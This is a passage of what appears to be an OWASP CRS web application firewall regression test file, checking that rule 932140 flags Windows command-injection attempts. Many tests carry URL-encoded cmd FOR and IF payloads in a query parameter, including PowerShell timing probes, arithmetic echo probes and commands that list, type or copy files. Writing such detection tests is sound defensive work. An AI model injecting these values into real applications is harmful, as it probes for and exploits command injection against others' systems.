"/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 11 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 12 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 13 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 14 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 15 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: 
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 16 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 17 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 18 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 19 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 20 + desc: 
imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 21 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 22 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 23 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 24 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 25 + 
desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 26 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 27 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 28 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 29 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: 
+ log_contains: id "932140" + - test_id: 30 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 31 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 32 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 33 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 34 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: 
localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 35 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 36 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 37 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 38 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" + version: HTTP/1.0 + 
output: + log_contains: id "932140" + - test_id: 39 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 40 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 41 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 42 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 43 + desc: imported test + stages: + - 
input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 44 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 45 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 46 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 47 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 48 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 49 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 50 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 51 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + 
log_contains: id "932140" + - test_id: 52 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 53 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 54 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 55 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 56 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + 
headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 57 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 58 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 59 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 60 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 61 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 62 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 63 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 64 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 65 + 
desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 66 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 67 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 68 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 69 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." 
+ version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 70 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 71 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 72 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log_contains: id 